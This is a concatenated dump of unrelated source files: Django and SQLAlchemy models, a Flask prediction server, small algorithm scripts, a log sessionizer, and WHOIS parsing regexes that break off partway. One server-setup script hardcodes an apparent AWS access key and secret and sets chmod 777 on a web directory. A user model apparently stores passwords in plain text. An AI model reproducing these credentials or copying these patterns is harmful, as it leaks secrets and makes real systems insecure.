        self.__clear_answers()
        solver = Game_Solver(self.game.puzzle)
        solver.print_board(self.game.puzzle)
        solver.solve(self.game.puzzle)
        print("___________________")
        solver.print_board(self.game.puzzle)
        self.__draw_puzzle()

    def return_level(self):
        """Return the currently selected difficulty level (or None)."""
        return self.level
998,158 | 156942020e684d80daf56ef5041d235ef4c0fdda | # -*- coding: utf-8 -*-
# Generated by Django 1.10.1 on 2016-11-22 01:10
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated migration: adds the `additional_comments` field to the
    # Report model. Generated code -- avoid hand-editing beyond this note.

    dependencies = [
        ('rescuteApp', '0003_report_location'),
    ]

    operations = [
        migrations.AddField(
            model_name='report',
            name='additional_comments',
            field=models.CharField(default='', max_length=1000),
        ),
    ]
998,159 | 29970f43d3f01729f71097b37b6c9eb300f55abc | # Import necessary modules
from flask import Flask, request
import pickle
import pandas as pd
app = Flask(__name__)

# Load the trained model and the training-time feature column list once at
# startup; both are used by /predict below.
with open('xgb_model_new','rb') as m:
    model = pickle.load(m)
with open('features.pkl', 'rb') as m:
    features = pickle.load(m)
@app.route("/")
def index():
return 'Server is up and running!'
@app.route("/predict",methods=['GET','POST'])
def predict():
json_data = request.get_json()
if not all(k in json_data for k in ["hp","age","km","model"]):
return "Not enough data for the prediction"
df = pd.DataFrame.from_dict([json_data])
df = pd.get_dummies(df).reindex(columns=features,fill_value=0)
prediction = model.predict(df)
return str(prediction[0])
app.run()
|
998,160 | d779c5f1b1fdc19b1ae5006cf0eed836c0701a87 | import sys
from collections import deque
def input(): return sys.stdin.readline().strip()
def main():
    """Print the base(-2) representation of N read from stdin.

    Digits are decided from the least-significant end: N's parity fixes
    each digit mod 2; for odd digits the contribution is removed (with a
    sign alternating per position) before halving. (Original note,
    translated: since the lowest term of N's (-2)-power expansion is
    determined mod 2, digits can be fixed recursively from the tail.)
    """
    N = int(input())
    if N == 0:
        print(0)
        return
    idx = 0
    ans = deque([])
    while N != 0:
        if N % 2 == 0:
            ans.appendleft(0)
        if N % 2 != 0:
            ans.appendleft(1)
            # Remove this digit's contribution; the sign alternates because
            # (-2)^idx alternates sign relative to 2^idx.
            N -= (-1) ** idx
        N //= 2
        idx += 1
    print("".join(map(str, ans)))

if __name__ == "__main__":
    main()
|
998,161 | a061a06e3209f6705b1fe949a600d860be1f98d9 | from .base import Base
from app.db import db
class PastPerformance(Base):
    """One historical race result line for a horse, uniquely identified by
    (horse, track, race date)."""
    __tablename__ = 'past_performances'
    __table_args__ = (
        db.Index(
            '_horse_track_date',
            'horse_id',
            'track_code',
            'race_date'
        ),
        db.UniqueConstraint(
            'horse_id',
            'track_code',
            'race_date',
            name='uniq_horse_track_date'
        )
    )

    id = db.Column(db.Integer, primary_key=True)

    # Relationships
    horse_id = db.Column(db.Integer, db.ForeignKey('horses.id'))
    horse = db.relationship("Horse", back_populates="past_performances")

    horse_name = db.Column(db.String)
    foreign_or_domestic = db.Column(db.String)
    foreign_race = db.Column(db.String)
    race_date = db.Column(db.Date)
    track_code = db.Column(db.String)
    race_number = db.Column(db.Integer)
    surface = db.Column(db.String)
    timeform_code = db.Column(db.String)
    inner_track_code = db.Column(db.String)
    distance = db.Column(db.DECIMAL)
    race_class = db.Column(db.String)
    claim_price = db.Column(db.DECIMAL)
    purse = db.Column(db.DECIMAL)
    track_condition = db.Column(db.String)
    sex_restrictions = db.Column(db.String)
    age_restrictions = db.Column(db.String)
    state_bred = db.Column(db.String)
    field_size = db.Column(db.Integer)
    # Split times for up to six fractions of the race.
    first_fraction = db.Column(db.DECIMAL)
    second_fraction = db.Column(db.DECIMAL)
    third_fraction = db.Column(db.DECIMAL)
    fourth_fraction = db.Column(db.DECIMAL)
    fifth_fraction = db.Column(db.DECIMAL)
    sixth_fraction = db.Column(db.DECIMAL)
    final_time = db.Column(db.DECIMAL)
    first_horse = db.Column(db.String)
    second_horse = db.Column(db.String)
    third_horse = db.Column(db.String)
    grade = db.Column(db.Integer)
    post_position = db.Column(db.Integer)
    # Position and lengths-behind-leader at each call point.
    # Bug fix: first_call_position / first_call_lengths_back were defined
    # three times in a row; the duplicates were redundant (the last
    # assignment wins in a class body) and have been removed.
    first_call_position = db.Column(db.Integer)
    first_call_lengths_back = db.Column(db.DECIMAL)
    second_call_position = db.Column(db.Integer)
    second_call_lengths_back = db.Column(db.DECIMAL)
    third_call_position = db.Column(db.Integer)
    third_call_lengths_back = db.Column(db.DECIMAL)
    fourth_call_position = db.Column(db.Integer)
    fourth_call_lengths_back = db.Column(db.DECIMAL)
    stretch_call_position = db.Column(db.Integer)
    stretch_call_lengths_back = db.Column(db.DECIMAL)
    final_call_position = db.Column(db.Integer)
    final_call_lengths_back = db.Column(db.DECIMAL)
    beyer_or_foreign_speed = db.Column(db.Integer)
    comment = db.Column(db.String)
    odds = db.Column(db.DECIMAL)
    odds_position = db.Column(db.Integer)
    claimed_code = db.Column(db.String)
    lasix = db.Column(db.String)
    bute = db.Column(db.String)
    blinkers = db.Column(db.String)
    bandages = db.Column(db.String)
    jockey = db.Column(db.String)
    trainer = db.Column(db.String)
    track_variant = db.Column(db.Integer)
    speed_rating = db.Column(db.Integer)
    breed = db.Column(db.String)
    owner = db.Column(db.String)

    def __repr__(self):
        return "<PastPerformance(id='%s' horse_id='%s')>" % (
            self.id, self.horse_id)
998,162 | aabbd5a2f2bbdf011c60694f2722c7bd2ed1d8ed | '''
See examples.py, constants.py, or main.py for configurable code.
'''
def clamp(value, min_value, max_value):
    """Constrain *value* to the range [min_value, max_value]."""
    lower_bounded = max(min_value, value)
    return min(max_value, lower_bounded)
def smoothstep(min_edge, max_edge, value):
    """Hermite interpolation: 0 below min_edge, 1 above max_edge,
    with a smooth S-curve (3t^2 - 2t^3) in between."""
    t = (value - min_edge) / (max_edge - min_edge)
    t = min(1, max(0, t))  # clamp to [0, 1]
    return t * t * (3 - 2 * t)
import random
def random_color():
    """Return a list of 3 random channel values, each in [0, 255]."""
    channels = []
    for _channel in range(3):
        channels.append(random.randint(0, 255))
    return channels
def toColor(V):
    """Clamp a vector's x, y, z components to [0, 255] and return them
    as an (r, g, b) tuple."""
    components = (V.x, V.y, V.z)
    return tuple(min(255, max(0, c)) for c in components)
class Traversable:
    '''
    Convenience base class for objects describing a rectangular 2D
    region.  It exposes the region bounds and supports iteration over
    the x-axis, the y-axis, and every (x, y) point inside the region.

    Subclasses should call __init__ with their bounds, or override the
    min/max accessor methods directly.
    '''
    def __init__(self, minx=0, miny=0, maxx=0, maxy=0):
        self.minx = minx
        self.maxx = maxx
        self.miny = miny
        self.maxy = maxy

    def min_xcor(self):
        # inclusive lower x bound
        return self.minx

    def max_xcor(self):
        # exclusive upper x bound (range semantics)
        return self.maxx

    def min_ycor(self):
        # inclusive lower y bound
        return self.miny

    def max_ycor(self):
        # exclusive upper y bound (range semantics)
        return self.maxy

    def xcors(self):
        '''All x coordinates of the region, left to right.'''
        return range(self.min_xcor(), self.max_xcor())

    def ycors(self):
        '''All y coordinates of the region, top to bottom.'''
        return range(self.min_ycor(), self.max_ycor())

    def cors(self):
        '''Yield every (x, y) point of the region, row by row.'''
        for row in self.ycors():
            for col in self.xcors():
                yield col, row
|
998,163 | c6d4cc1e52cd9db8bff2e588b3b9d5d178d4a79d | #! /usr/bin/env python
print "Configure Server Started!!!"
from shutil import copy, copytree, move
import subprocess
#the copy and copytree methods can help you move stuff out of your expanded package to various places on the server.
#subprocess.call(["rm /var/www/html/test.py",""], shell=True)
#subprocess.call(["rmdr /var/www/html",""], shell=True)
#subprocess.call(["apachectl -k stop",""], shell=True)
move("/home/root/project-code/AppServer/httpd.conf", "/etc/httpd/conf")
subprocess.call(["mkdir /var/www/styles",""], shell=True)
#subprocess.call(["apachectl -k start",""], shell=True)
copytree("/home/root/project-code/AppServer", "/var/www/python")
subprocess.call(["mkdir /var/www/python/files",""], shell=True)
subprocess.call(["chmod 777 /var/www/python/files",""], shell=True)
subprocess.call(["yum install -y python-json",""], shell=True)
subprocess.call(["yum install -y python-imaging",""], shell=True)
#executing commandline calls can be done with the subprocess module
subprocess.call(["apachectl -k start",""], shell=True)
#Register with load balancer
from subprocess import Popen, PIPE
cmd = 'curl -s http://169.254.169.254/latest/meta-data/instance-id'
arglist = cmd.split()
instance_id = Popen(arglist, stdout=PIPE).communicate()[0]
from boto.ec2.elb import ELBConnection
conn = ELBConnection('AKIAJHJXHTMTVQYVZJOA','2YVZfFXQ7mhdFeUnMjcMOJ8uc5GBjz5LXhmh8LiM')
lbs = conn.get_all_load_balancers()
conn.register_instances('appserver-lb', [instance_id])
#make sure to start any services required for this server.
print "Configure Server Complete"
|
998,164 | 06d008c5a3fb04c1a0297d632c38f6dc1bf3f5f7 | import random
import numpy as np
from cs231n.data_utils import load_CIFAR10
import matplotlib.pyplot as plt
plt.rcParams['figure.figsize'] = (10.0, 8.0)
plt.rcParams['image.interpolation'] = 'nearest'
plt.rcParams['image.cmap'] = 'gray'
cifar10_dir = 'cifar-10-batches-py'
X_train, y_train, X_test, y_test = load_CIFAR10(cifar10_dir)
print('Training data shape', X_train.shape)
print('Training labels shape', y_train.shape)
print('Test data shape', X_test.shape)
print('Test labels shape', y_test.shape)
classes = ['plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck']
num_classes = len(classes)
sample_per_class = 7
for y, cls in enumerate(classes):
idxs = np.flatnonzero(y_train == y)
idxs = np.random.choice(idxs, sample_per_class, replace=False)
for i, idx in enumerate(idxs):
plt_idx = i * num_classes + y + 1
plt.subplot(sample_per_class, num_classes, plt_idx)
plt.imshow(X_train[idx].astype('uint8'))
plt.axis('off')
if i == 0:
plt.title(cls)
plt.show() |
998,165 | c419aceacc79e28cc296f40a1cef14753f0c67df | import csv
import datetime
import time
import os
# Move into the ./input directory where the input files live.
dirpath = os.getcwd()
print("current directory is : " + dirpath)
path_to_file = './input/'
os.chdir(path_to_file)
print("current directory is : " + os.getcwd())
# get inactivity period from .txt
# NOTE(review): this handle is never closed; a `with` block would be safer.
inactivity_period_file = open('inactivity_period.txt', mode='r')
inactivity_period = int(inactivity_period_file.read())
# datastructure that holds info from the input file
# Maps epoch-second -> {ip -> {'old datetime', 'datetime', 'doc'}}
# (structure established in take_info_from_row / add_to_dict below).
info = {}
# convert HH:MM:SS to seconds
def get_sec(time_str):
    """Convert an 'HH:MM:SS' string into a total number of seconds."""
    hours, minutes, seconds = (int(part) for part in time_str.split(':'))
    return hours * 3600 + minutes * 60 + seconds
# check if IP exists in the previous time frame, if it exists save IP information and
# remove from the previous time
# check if IP exists in the previous time frame, if it exists save IP information and
# remove from the previous time
def check_if_ip_exists_before(cur_time, inact_time, ip, new_ip_time_data):
    """Look for *ip* within the preceding inactivity window.

    Scans timestamps (cur_time - 1) down to (cur_time - inact_time) in the
    global ``info`` dict; if the IP was active there, its session start
    ('old datetime') is carried forward, its document count is incremented,
    and the stale entry is removed.  Returns the (possibly updated)
    new_ip_time_data dict.
    """
    global info
    for t in range(cur_time - 1, cur_time - inact_time - 1, -1):
        if t >= 0:
            if t in info and ip in info[t]:
                # Continue the earlier session: keep its original start time
                # and bump the document count.
                new_ip_time_data['old datetime'] = info[t][ip]['old datetime']
                new_ip_time_data['doc'] = info[t][ip]['doc'] + 1
                info[t].pop(ip)
    return new_ip_time_data
# if time already exists, write new IP address information if IP is not there, else update doc
# if time already exists, write new IP address information if IP is not there, else update doc
def copy_data_IP(cur_time, inact_time, ip, new_ip_time_data):
    """Merge a new hit for *ip* at *cur_time* into the session data.

    Assumes ``info[cur_time]`` already exists (the caller checks).  If the
    IP already has an entry at this exact second, only its document count is
    bumped; otherwise the preceding window is searched for an open session.
    """
    # if IP exists in the current time, update number of documents
    global info
    if ip in info[cur_time]:
        # NOTE(review): the existing entry's 'old datetime' is not merged
        # here; only the new record's doc counter is bumped — confirm intent.
        new_ip_time_data['doc'] = new_ip_time_data['doc'] + 1
    else:
        new_ip_time_data = check_if_ip_exists_before(cur_time, inact_time, ip, new_ip_time_data)
    return new_ip_time_data
# convert 2017-06-30 00:00:00 to epoch, so that it's feasible to keep track of inactivity_period
def convert_datetime_to_ecoch(my_time):
    """Convert a 'YYYY-MM-DD HH:MM:SS' string into a Unix epoch integer
    (interpreted in the local timezone)."""
    parsed = time.strptime(my_time, "%Y-%m-%d %H:%M:%S")
    return int(time.mktime(parsed))
# convert epoch to date time, this is useful when writing the information to output file
def convert_epoch_to_datetime(ts_epoch):
    """Convert a Unix epoch into a 'YYYY-MM-DD HH:MM:SS' local-time string
    (inverse of convert_datetime_to_ecoch; used for the output file)."""
    moment = datetime.datetime.fromtimestamp(ts_epoch)
    return moment.strftime('%Y-%m-%d %H:%M:%S')
# find expired sessions and delete it from dictionary
# find expired sessions and delete it from dictionary
def print_and_delete_expired_session(cur_time_in_sec, inactivity_period, f):
    """Write every session older than *inactivity_period* to *f* and drop it.

    Output line format: ip,start,end,duration,doc_count.  Expired timestamps
    are collected first and popped afterwards so the global ``info`` dict is
    not mutated while being iterated.
    """
    output = ""
    expired_timel = []
    global info
    for t in info.keys():
        if (cur_time_in_sec - t) > inactivity_period:
            for ip in info[t].keys():
                output = ip
                olddatetime = info[t][ip]['old datetime']
                # NOTE(review): this local name shadows the imported
                # `datetime` module (harmless here, but confusing).
                datetime = info[t][ip]['datetime']
                # Duration is inclusive of both endpoints.
                duration = datetime - olddatetime + 1
                doc = info[t][ip]['doc']
                output = output + "," + convert_epoch_to_datetime(olddatetime) + "," + convert_epoch_to_datetime(
                    datetime) + "," + str(duration) + "," + str(doc)
                # write to file
                # print(output)
                f.write(output + "\n")
            expired_timel.append(t)
    # delete inactive time records
    for t_to_pop in expired_timel:
        info.pop(t_to_pop)
# take corresponding column values from a row
# take corresponding column values from a row
def take_info_from_row(row, ip_index, date_index, time_index):
    """Build the per-hit session record for one CSV row.

    Returns (ip, record) where record holds the hit's epoch timestamp twice
    ('old datetime' = session start, 'datetime' = last hit) and a document
    count of 1.
    """
    # NOTE(review): `global info` is declared but `info` is never used here.
    global info
    ip = row[ip_index]
    date = row[date_index]
    # date = datetime.datetime.strptime(date, '%m/%d/%y').strftime('%Y-%m-%d')
    time = row[time_index]
    my_time = date + " " + time
    doc = 1
    new_ip_time_data_epoch = {
        'old datetime': convert_datetime_to_ecoch(my_time),
        'datetime': convert_datetime_to_ecoch(my_time),
        'doc': doc}
    return ip, new_ip_time_data_epoch
# add the row information from csv to dictionary
# add the row information from csv to dictionary
def add_to_dict(row, ip_index, date_index, time_index, inactivity_period, f):
    """Record one CSV row into the global ``info`` dict and flush expired
    sessions to the output file *f*."""
    global info
    ip, new_ip_time_data = take_info_from_row(row, ip_index, date_index, time_index)
    cur_time_in_sec = new_ip_time_data['datetime']
    # if current time is in the dictionary,
    # 1. check if current IP reading is in the current time
    # 2. check if current IP reading is in the previous time
    if cur_time_in_sec in info:
        new_ip_time_data = copy_data_IP(cur_time_in_sec, inactivity_period, ip, new_ip_time_data)
        info[cur_time_in_sec][ip] = new_ip_time_data
    # if current time is not in the dictionary,
    # 1. check if the current IP reading is in the previous time
    else:
        new_ip_time_data = check_if_ip_exists_before(cur_time_in_sec, inactivity_period, ip, new_ip_time_data)
        info[cur_time_in_sec] = {ip: new_ip_time_data}
    # print and delete expired record
    print_and_delete_expired_session(cur_time_in_sec, inactivity_period, f)
# once it finishes reading all rows from csv, and
# if dictionary is not empty, print it out in instructed order
# once it finishes reading all rows from csv, and
# if dictionary is not empty, print it out in instructed order
def print_remaining(info):
    """Flush every still-open session, ordered by start then last-hit time.

    NOTE(review): this function references the module-global file handle
    ``f`` (it is not a parameter) — it only works when called from the main
    script below; consider passing the handle explicitly.
    """
    sort_this_dict = {}
    # convert dictionary to list
    # (flattens {time: {ip: record}} into {ip: record}; a later time's entry
    # for the same ip overwrites an earlier one)
    for t, value in info.items():
        sort_this_dict = {**sort_this_dict, **value}
    # sort the list by first accessed date and last accessed date
    dr = sorted(sort_this_dict.items(), key=lambda dct: (dct[1]['old datetime'], dct[1]['datetime']))
    print_from_list(dr, f)
# printing sorted remaining information
# printing sorted remaining information
def print_from_list(dr, f):
    """Write each (ip, record) pair in *dr* to *f* as
    ip,start,end,duration,doc_count."""
    output = ""
    for i in range(0, len(dr)):
        row = dr[i]
        ip = row[0]
        output = ip
        olddatetime = row[1]['old datetime']
        # NOTE(review): this local name shadows the imported `datetime`
        # module (harmless here, but confusing).
        datetime = row[1]['datetime']
        # Duration is inclusive of both endpoints.
        duration = datetime - olddatetime + 1
        doc = row[1]['doc']
        output = output + "," + convert_epoch_to_datetime(olddatetime) + "," + convert_epoch_to_datetime(
            datetime) + "," + str(duration) + "," + str(doc)
        # write to file
        f.write(output + "\n")
        # print(output)
# read csv file line by line and get Time as key,
# value is in list that includes all IP addresses that accessed at the Time
# read csv file line by line and get Time as key,
# value is in list that includes all IP addresses that accessed at the Time
with open('log.csv', mode='r', encoding='utf-8-sig') as infile:
    reader = csv.reader(infile)
    headers = next(reader)
    # Locate the required columns by header name.
    ip_index = headers.index("ip")
    date_index = headers.index("date")
    time_index = headers.index("time")
    # Switch to the output directory and open the result file.
    path_to_file = '../output/'
    os.chdir(path_to_file)
    f = open('sessionization.txt', 'w')
    # read each row
    for row in reader:
        add_to_dict(row, ip_index, date_index, time_index, inactivity_period, f)
    # print(info)
    # Flush any sessions still open at end of input.
    if bool(info):
        print_remaining(info)
    f.close()
|
998,166 | 9c959fac06208eb7724c4897e062c390c302733e |
from flask_sqlalchemy import SQLAlchemy
from flask_marshmallow import Marshmallow
from marshmallow_sqlalchemy import SQLAlchemyAutoSchema
import datetime
db = SQLAlchemy()
class Libro(db.Model):
    """Book record (Spanish: 'libro'); one book can appear in many loans."""
    id = db.Column(db.Integer, primary_key = True)
    titulo = db.Column( db.String(50) )  # title
    autor = db.Column( db.String(50) )  # author
    genero = db.Column( db.String(50) )  # genre
    # one-to-many: all loans (Prestamo) of this book
    prestamos = db.relationship("Prestamo", backref='libro', lazy=True)
class Prestamo(db.Model):
    """Loan record linking a book (Libro) to a user (Usuario)."""
    id = db.Column(db.Integer, primary_key = True)
    fecha = db.Column(db.DateTime)  # loan date
    dias = db.Column(db.Integer)  # loan duration in days
    libro_id = db.Column(db.Integer, db.ForeignKey('libro.id'))
    usuario_id = db.Column(db.Integer, db.ForeignKey('usuario.id'))
class Usuario(db.Model):
    """Library user; deleting a user cascades to their loans."""
    id = db.Column(db.Integer, primary_key=True)
    username = db.Column(db.String(50), unique=True, nullable=False)
    # NOTE(review): the password ('contrasena') looks like it is stored as
    # plain text — confirm hashing happens before it is written here.
    contrasena = db.Column(db.String(50), nullable=False)
    prestamos = db.relationship("Prestamo", backref='usuario', cascade='all, delete, delete-orphan', lazy=True)
class LibroSchema(SQLAlchemyAutoSchema):
    """Marshmallow (de)serialization schema for Libro."""
    class Meta:
        model = Libro
        include_relationships = True
        load_instance = True
class PrestamoSchema(SQLAlchemyAutoSchema):
    """Marshmallow (de)serialization schema for Prestamo (exposes FK ids)."""
    class Meta:
        model = Prestamo
        include_fk = True
        load_instance = True
class UsuarioSchema(SQLAlchemyAutoSchema):
    """Marshmallow (de)serialization schema for Usuario."""
    class Meta:
        model = Usuario
        include_relationships = True
        load_instance = True
|
998,167 | 8c237bdb7868c7b7868a35237a5080a2ce00e1b7 | #coding=utf-8
#####################################################
# Written By lsvih #
# 2016-11-07 #
# Convert algebraic expression #
# to functional expression #
#####################################################
from data import Stack
from data import BiTree
import sys
operators = {'(': 0, ')': 0, '+': 1, '-': 1, '*': 2, '/': 2, '^': 3}
operators_name = {'+':'add','-':'mius','*':'muilt','/':'divide','^':'power'}
def break_word(Exp):
    """Tokenize an algebraic expression string.

    Each operator character (from the module-level ``operators`` table) is
    surrounded with '|' delimiters and the string is then split on '|',
    yielding alternating operand/operator tokens with empties dropped.
    """
    for op in operators:
        Exp = Exp.replace(op, '|' + op + '|')
    tokens = Exp.split('|')
    # Fixed: the original filtered with "not item is ''" — an identity test
    # that only works because CPython interns the empty string.  Compare by
    # value instead.
    return [item for item in tokens if item != ""]
def clear_brackets(exp):
    """Convert an infix expression string to postfix (shunting-yard).

    Returns a Stack whose contents are the postfix token sequence, with all
    parentheses removed.  Uses the module-level ``operators`` precedence
    table.

    Fixed: every comparison originally used identity (``is``/``is not``)
    instead of equality — that only works by CPython's small-int/string
    interning accident; all comparisons now use ==/!=.
    """
    exp = break_word(exp)
    temp = Stack()      # operator stack
    result = Stack()    # output (postfix) stack
    for elem in exp:
        if elem not in operators:
            # Operand: goes straight to the output.
            result.push(elem)
        else:
            if temp.length() == 0 or elem == '(':
                temp.push(elem)
            else:
                if elem == ')':
                    # Pop operators back to the matching '(' (discarded).
                    while temp.getTop() != '(':
                        result.push(temp.pop())
                    temp.pop()
                elif operators[elem] < operators[temp.getTop()]:
                    # Lower precedence: flush higher-precedence operators
                    # down to (but not past) an open parenthesis.
                    while temp.length() != 0:
                        if temp.getTop() == '(':
                            break
                        result.push(temp.pop())
                    temp.push(elem)
                else:
                    temp.push(elem)
    # Flush any remaining operators.
    while temp.length() != 0:
        result.push(temp.pop())
    return result
def expression_tree(Exp):
    """Build a binary expression tree (BiTree) from an infix expression.

    The expression is first converted to postfix via clear_brackets(), then
    folded into a tree: operands become leaves, operators become internal
    nodes with their two most recent subtrees as children.

    Fixed: the ``is not 0`` identity comparisons were replaced with ``!= 0``.
    """
    origin = clear_brackets(Exp)
    temp = Stack()   # stack of partial subtrees
    stack = Stack()  # postfix tokens, reversed back into reading order
    while origin.length() != 0:
        stack.push(origin.pop())
    while stack.length() != 0:
        if stack.getTop() in operators:
            node = BiTree(stack.pop())
            node.right = temp.pop()
            node.left = temp.pop()
        else:
            node = BiTree(stack.pop())
        temp.push(node)
    return temp.pop()
def create_function_expression(Tree):
    """Recursively rewrite an expression tree into functional notation.

    Operator nodes become calls named via ``operators_name`` (e.g. '+' ->
    'add(left,right)').  Note: this mutates Tree.value in place while
    recursing, and returns the rewritten string for the root.
    """
    if Tree.value in operators_name:
        Tree.value = operators_name[Tree.value] +'('+ create_function_expression(Tree.left) +','+ create_function_expression(Tree.right) +')'
    return Tree.value
if len(sys.argv) is 1:
print "Usage:f2f.py {your expression}"
print 'example:f2f.py "A+b-x*(12.13+51^y)^1.4121"'
else:
print "input:"+sys.argv[1]
print "output:"+create_function_expression(expression_tree(sys.argv[1]))
|
998,168 | 1bb70e84949fa3c86f2de52b817879f035e527c4 | import setuptools
# PyPI distribution metadata for the selenium element-screenshot helper.
setuptools.setup(
    name='seleniumslicer',
    version='0.0.1',
    author='Feng Liu',
    author_email='feng3245@gmail.com',
    description='Given selenium drive and elements. Extract the element screen capture',
    long_description='Given a driver and an element on the page save the element to the file name of your chosing',
    long_description_content_type="text/markdown",
    packages=setuptools.find_packages(),
    classifiers=[
        "Programming Language :: Python :: 3",
        "License :: OSI Approved :: MIT License",
        "Operating System :: OS Independent",]
)
|
998,169 | 4fd746e39f5735f234cf057ee9ddfd27b543c432 |
# WHOIS-response parsing rules keyed by top-level domain.
# Each entry maps a field name to a regex with one capture group (or several
# for multi-value fields such as name servers).  'extend' names another TLD
# whose rules are inherited (None = no parent); a field value of None
# disables that field for the TLD.
roots = {
    'com': {
        'extend': None,
        'domain_name': r'Domain Name:\s?(.+)',
        'registrar': r'Registrar:\s?(.+)',
        'registrant': None,
        'creation_date': r'Creation Date:\s*(.+)\s*',
        'expiration_date': r'Expiration Date:\s*(.+)\s*',
        'updated_date': r'Updated Date:\s*(.+)\s*',
        'name_servers': r'Name Server:\s*(.+)\s*',
        'status': r'Status:\s?(.+)',
        'emails': r'[\w.-]+@[\w.-]+\.[\w]{2,4}',
    },
    'net': {
        'extend': 'com',
    },
    'org': {
        'extend': 'com',
        'creation_date': r'\nCreated On:\s*(.+)\s*',
        'expiration_date': r'\nRegistry Expiry Date:\s?(.+)',
        'updated_date': r'\nLast Updated On:\s*(.+)\s*',
        'name_servers': r'Name Server:\s?(.+)\s*',
    },
    'edu': {
        'extend': 'com',
        'creation_date': r'Domain record activated:\s+(.+)',
        'expiration_date': r'Domain expires:\s+(.+)',
        'updated_date': r'Domain record last updated:\s+(.+)',
    },
    'uk': {
        'extend': 'com',
        'registrant': r'Registrant:\n\s*(.+)',
        'creation_date': r'Registered on:\s*(.+)',
        'expiration_date': r'Renewal date:\s*(.+)',
        'updated_date': r'Last updated:\s*(.+)',
        'name_servers': r'Name Servers:\s*(.+)\s*',
        'status': r'Registration status:\n\s*(.+)',
    },
    'pl': {
        'extend': 'uk',
        'creation_date': r'\ncreated:\s*(.+)\n',
        'updated_date': r'\nlast modified:\s*(.+)\n',
        'name_servers': r'\nnameservers:\s*(.+)\n\s*(.+)\n',
        'status': r'\nStatus:\n\s*(.+)',
    },
    'ru': {
        'extend': 'com',
        'domain_name': r'\ndomain:\s*(.+)',
        'creation_date': r'\ncreated:\s*(.+)',
        'expiration_date': r'\npaid-till:\s*(.+)',
        'updated_date': r'\nLast updated on\s*(.+)',
        'name_servers': r'\nnserver:\s*(.+)',
        'status': r'\nstate:\s*(.+)',
    },
    'ru_rf': {
        'extend': 'com',
        'domain_name': r'\ndomain:\s*(.+)',
        'creation_date': r'\ncreated:\s*(.+)',
        'expiration_date': r'\npaid-till:\s*(.+)',
        'name_servers': r'\nnserver:\s*(.+)',
        'status': r'\nstate:\s*(.+)',
    },
    'su': {
        'extend': 'ru',
    },
    'lv': {
        'extend': 'ru',
        'creation_date': r'Registered:\s*(.+)\n',
        'updated_date': r'Changed:\s*(.+)\n',
        'status': r'Status:\s?(.+)',
    },
    'jp': {
        'domain_name': r'\[Domain Name\]\s?(.+)',
        'registrar': None,
        'registrant': r'\[Registrant\]\s?(.+)',
        'creation_date': r'\[Created on\]\s*(.+)\n',
        'expiration_date': r'\[Expires on\]\s*(.+)\n',
        'updated_date': r'\[Last Update\]\s*(.+)\n',
        'name_servers': r'\[Name Server\]\s*(.+)',
        'status': r'\[Status\]\s?(.+)',
        'emails': r'[\w.-]+@[\w.-]+\.[\w]{2,4}',
    },
    'co_jp': {
        'extend': 'jp',
        'creation_date': r'\[Registered Date\]\s?(.+)',
        'expiration_date': r'\[State\].+\((.+)\)',
    },
    'de': {
        'extend': 'com',
        'domain_name': r'\ndomain:\s*(.+)',
        'updated_date': r'\nChanged:\s?(.+)',
        'name_servers': r'Nserver:\s*(.+)',
    },
    'at': {
        'extend': 'com',
        'domain_name': r'domain:\s?(.+)',
        'updated_date': r'changed:\s?(.+)',
        'name_servers': r'nserver:\s*(.+)',
    },
    'eu': {
        'extend': 'com',
        'domain_name': r'\ndomain:\s*(.+)',
        'registrar': r'Name:\s?(.+)',
    },
    'biz': {
        'extend': 'com',
        'registrar': r'Sponsoring Registrar:\s?(.+)',
        'registrant': r'Registrant Organization:\s?(.+)',
        'creation_date': r'Creation Date:\s*(.+)\s*',
        'expiration_date': r'Registry Expiry Date:\s*(.+)\s*',
        'updated_date': r'Updated Date:\s*(.+)\s*',
        'status': None,
    },
    'info': {
        'extend': 'biz',
        'creation_date': r'Created On:\s?(.+)',
        'expiration_date': r'Expiration Date:\s?(.+)$',
        'updated_date': r'Last Updated On:\s?(.+)$',
        'status': r'Status:\s?(.+)',
    },
    'name': {
        'extend': 'com',
        'status': r'Domain Status:\s?(.+)',
    },
    'us': {
        'extend': 'name',
    },
    'co': {
        'extend': 'biz',
        'status': r'Status:\s?(.+)',
    },
    'me': {
        'extend': 'biz',
        'creation_date': r'Creation Date:\s?(.+)',
        'expiration_date': r'Expiry Date:\s?(.+)',
        'updated_date': r'Updated Date:\s?(.+)',
        'name_servers': r'Nameservers:\s?(.+)',
        'status': r'Domain Status:\s?(.+)',
    },
    'be': {
        'extend': 'pl',
        'domain_name': r'\nDomain:\s*(.+)',
        'registrar': r'Company Name:\n?(.+)',
        'creation_date': r'Registered:\s*(.+)\n',
        'status': r'Status:\s?(.+)',
    },
    'nz': {
        'extend': None,
        'domain_name': r'domain_name:\s?(.+)',
        'registrar': r'registrar_name:\s?(.+)',
        'registrant': r'registrant_contact_name:\s?(.+)',
        'creation_date': r'domain_dateregistered:\s?(.+)',
        'expiration_date': r'domain_datebilleduntil:\s?(.+)',
        'updated_date': r'domain_datelastmodified:\s?(.+)',
        'name_servers': r'ns_name_[0-9]{2}:\s?(.+)',
        'status': r'query_status:\s?(.+)',
        'emails': r'[\w.-]+@[\w.-]+\.[\w]{2,4}',
    },
    'cz': {
        'extend': 'com',
        'domain_name': r'Domain:\s?(.+)',
        'registrar': r'registrar:\s?(.+)',
        'registrant': r'registrant:\s?(.+)',
        'creation_date': r'registered:\s?(.+)',
        'expiration_date': r'expire:\s?(.+)',
        'updated_date': r'changed:\s?(.+)',
        'name_servers': r'nserver:\s*(.+) ',
    },
    'it': {
        'extend': 'com',
        'domain_name': r'Domain:\s?(.+)',
        'registrar': r'Registrar:\s*Organization:\s*(.+)',
        'registrant': r'Registrant:\s?Name:\s?(.+)',
        'creation_date': r'Created:\s?(.+)',
        'expiration_date': r'Expire Date:\s?(.+)',
        'updated_date': r'Last Update:\s?(.+)',
        'name_servers': r'Nameservers:\s?(.+)\s?(.+)\s?(.+)\s?(.+)',
        'status': r'Status:\s?(.+)',
    },
    'fr': {
        'extend': 'com',
        'domain_name': r'domain:\s?(.+)',
        'registrar': r'registrar:\s*(.+)',
        'registrant': r'contact:\s?(.+)',
        'creation_date': r'created:\s?(.+)',
        'expiration_date': None,
        'updated_date': r'last-update:\s?(.+)',
        'name_servers': r'nserver:\s*(.+)',
        'status': r'status:\s?(.+)',
    },
    'io': {
        'extend': 'com',
        'expiration_date': r'\nRegistry Expiry Date:\s?(.+)',
    },
    'br': {
        'extend': 'com',
